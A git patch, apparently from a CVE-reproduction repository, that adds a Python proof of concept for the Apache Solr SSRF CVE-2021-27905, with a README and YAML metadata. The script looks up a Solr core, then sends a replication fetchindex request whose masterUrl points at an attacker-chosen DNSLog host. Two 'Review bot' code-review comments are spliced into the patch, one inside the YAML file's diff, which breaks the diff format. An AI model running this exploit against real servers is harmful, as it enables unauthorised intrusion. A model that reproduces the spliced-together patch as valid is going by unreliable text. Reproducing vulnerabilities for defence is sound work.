From aa3df1d5aa270b65c499200098ae223e62c06bef Mon Sep 17 00:00:00 2001
From: jia <18373490@buaa.edu.cn>
Date: Thu, 9 Mar 2023 05:19:48 -0800
Subject: [PATCH] add CVE-2021-27905
---
 .../2021/CVE-2021-27905/CVE-2021-27905.py | 81 +++++++++++++++++++
 cve/apache/2021/CVE-2021-27905/README.md | 18 +++++
 cve/apache/2021/yaml/CVE-2021-27905.yaml | 19 +++++
 openkylin_list.yaml | 1 +
 4 files changed, 119 insertions(+)
 create mode 100644 cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py
 create mode 100644 cve/apache/2021/CVE-2021-27905/README.md
 create mode 100644 cve/apache/2021/yaml/CVE-2021-27905.yaml
diff --git a/cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py b/cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py
new file mode 100644
index 00000000..f9bb1129
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-27905/CVE-2021-27905.py
@@ -0,0 +1,81 @@
+# CVE-2021-27905
+# Apache solr ssrf
+
+import requests
+import urllib3
+import json
+import sys, getopt
+urllib3.disable_warnings()
+
+
+
+
+def title():
+ print("[-------------------------------------------------------------]")
+ print("[-------------- Apache Solr SSRF漏洞 ---------------]")
+ print("[-------- CVE-2021-27905 ----------]")
+ print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]")
+ print("[-------- Author:Henry4E36 ------------]")
+ print("[-------------------------------------------------------------]")
+
+def commit():
+ url = ""
+ try:
+ opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="])
+ for op, value in opt:
+ if op == "-h" or op == "--help":
+ print("""
+ [-] Apache Solr SSRF漏洞 (CVE-2021-27905)
+ [-] Options:
+ -h or --help : 方法说明
+ -u or --url : 站点URL地址
+ -d or --dnslog : DnsLog
+ """)
+ sys.exit(0)
+ elif op == "-u" or op == "--url=":
+ url = value
+ elif op == "-d" or op == "--dnslog=":
+ dnslog = value
+ else:
+ print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
+ sys.exit()
+ return url, dnslog
+
+ except Exception as e:
+ print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
+ sys.exit(0)
+
+def target_core(url):
+ target_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
+ }
+ try:
+ res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
+ core = list(json.loads(res.text)["status"])[0]
+ return core
+ except Exception as e:
+ print(f"[!] 
目标系统: {url} 出现意外!\n ",e)
+
+def ssrf(core,dnslog):
+ target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}"
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
+ }
+ try:
+ res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
+ status = json.loads(res.text)["status"]
+ if res.status_code == 200 and status == "OK":
+ print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m")
+ else:
+ print(f"[0] 目标系统: {url} 不存在SSRF漏洞")
+
+ except Exception as e:
+ print(f"[!] 目标系统: {url} 出现意外!\n ", e)
+
+
+if __name__ == "__main__":
+ title()
+ url ,dnslog = commit()
+ core = target_core(url)
+ ssrf(core,dnslog)
\ No newline at end of file
diff --git a/cve/apache/2021/CVE-2021-27905/README.md b/cve/apache/2021/CVE-2021-27905/README.md
new file mode 100644
index 00000000..122f97df
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-27905/README.md
@@ -0,0 +1,18 @@
+# Solr-SSRF
+Apache Solr SSRF
+#Use
+Apache Solr 中的 ReplicationHandler(通常在 Solr 内核下的 “/replication” 注册)有一个 “masterUrl”(也称为 “leaderUrl” 别名)参数,用于指定另一个 Solr 内核上的另一个 ReplicationHandler 将索引数据复制到本地核心中。为了防止SSRF漏洞,Solr应该根据它用于“分片”参数的类似配置检查这些参数。在修复此错误之前,它没有。此问题基本上会影响在8.8.2中修复之前的所有Solr版本。
+[-] Apache Solr SSRF漏洞 (CVE-2021-27905)
+
+[-] Options:
+
+ -h or --help : 方法说明
+ -u or --url : 站点URL地址
+ -d or --dnslog : DnsLog
+
+# eg
+
+python3 CVE-2021-27905.py -u URL -d dnslog
+
+# reference
+code from: https://github.com/Henry4E36/Solr-SSRF
diff --git a/cve/apache/2021/yaml/CVE-2021-27905.yaml b/cve/apache/2021/yaml/CVE-2021-27905.yaml
new file mode 100644
index 00000000..d5b9b83f
--- /dev/null
+++ b/cve/apache/2021/yaml/CVE-2021-27905.yaml
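Review bot: In `commit()` of `CVE-2021-27905.py` the long options never match: `getopt.getopt` returns long option names without the trailing `=`, so `op == "--url="` and `op == "--dnslog="` are always false and `--url`/`--dnslog` fall through to the usage error; compare with `elif op in ("-u", "--url"):` and `elif op in ("-d", "--dnslog"):`. `ssrf(core, dnslog)` reads `url` from the module-level name assigned under `__main__` instead of taking it as an argument, so it fails with a `NameError` when the module is imported; `def ssrf(url, core, dnslog):` makes the dependency explicit. When `target_core()` reaches its `except` branch it returns `None`, and the main block still calls `ssrf()`, which then queries `/solr/None/replication/` and prints a result that says nothing about a real core; stop when `core is None`. `verify=False` combined with the import-time `urllib3.disable_warnings()` silently disables certificate checks for every request, which deserves at least a comment or an opt-in flag.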
@@ -0,0 +1,19 @@
+id: CVE-2021-27905
+source: https://github.com/Henry4E36/Solr-SSRF
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: 超危
+ description:
+ Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。
+ scope-of-influence:
+ Apache Solr < 8.8.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
+ - https://security.netapp.com/advisory/ntap-20210611-0009/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2021-27905
+ cnvd-id: CNNVD-202104-914
+ kve-id: None
+ tags: cve2021,Apache,Solr,SSRF
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 323454b7..10edfee3 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,6 +4,7 @@ cve:
 - CVE-2020-9490
 - CVE-2021-41773
 - CVE-2021-42013
+ - CVE-2021-27905
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
-- 
Gitee
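Review bot: In `CVE-2021-27905.yaml`, `severity: 超危` and `cvss-score: 8.1` disagree, because 8.1 sits in the CVSS v3.1 High band (7.0–8.9) rather than Critical; the label, the score or the `AC:H` in `cvss-metrics` should be rechecked against the NVD entry already listed under `reference`. `cnvd-id` carries a CNNVD identifier (`CNNVD-202104-914`), so either the key or the value looks misplaced. The `name` field holds a product description of Solr rather than the vulnerability name, and `description` never states that the issue is SSRF through `masterUrl`; a short name such as `Apache Solr ReplicationHandler SSRF` would keep the entry consistent with the `SSRF` tag and easier to search.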